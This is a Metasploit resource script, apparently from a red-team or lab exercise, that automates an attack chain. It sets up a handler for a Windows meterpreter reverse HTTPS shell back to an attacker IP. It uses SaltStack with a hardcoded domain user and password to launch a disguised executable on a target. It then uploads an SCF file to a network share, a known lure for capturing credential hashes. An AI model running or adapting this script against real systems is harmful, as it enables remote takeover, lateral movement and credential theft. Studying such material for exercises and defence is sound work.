<ruby>

puts "[+] Loading variables from shell environment..."
attacker_ip = "#{ENV['AttackerIP']}"
msf_payload = "#{ENV['MSFPayload']}"
payload_name = "#{ENV['PayloadName']}"
initial_access_port = "#{ENV['InitialAccessPort']}"
target_salt_name = "#{ENV['TargetSaltName']}"
scf_name = "#{ENV['SCFName']}"
sleep 2

def wait_for_session(session_id)
    puts "[+] Waiting for Meterpreter session..."
    until framework.sessions.keys.length > session_id - 1; sleep 2; end
    run_single("sessions -l")
    sleep 15
end

puts "[+] Loading handler for reverse_winhttps session..."
sleep 2
run_single("use exploit/multi/handler")
run_single("set PAYLOAD windows/x64/meterpreter/reverse_winhttps")
run_single("set LHOST #{attacker_ip}")
run_single("set LPORT #{initial_access_port}")
run_single("exploit -j")
sleep 2

run_single("sudo salt #{target_salt_name} cmd.run shell=powershell runas='holey\\young.zaffina' password='P@55w0rd!' 'Start-Process C:\\Users\\young.zaffina\\Downloads\\gpdmonitor.exe'")
sleep 2
wait_for_session(1)
sleep 2
run_single("sessions -i 1 -C \"upload #{scf_name} '\\\\\\\\hn-files\\\\shares\\\\#{scf_name}'\"")
sleep 2

puts "[+] Exiting..."
run_single("exit -y")
</ruby>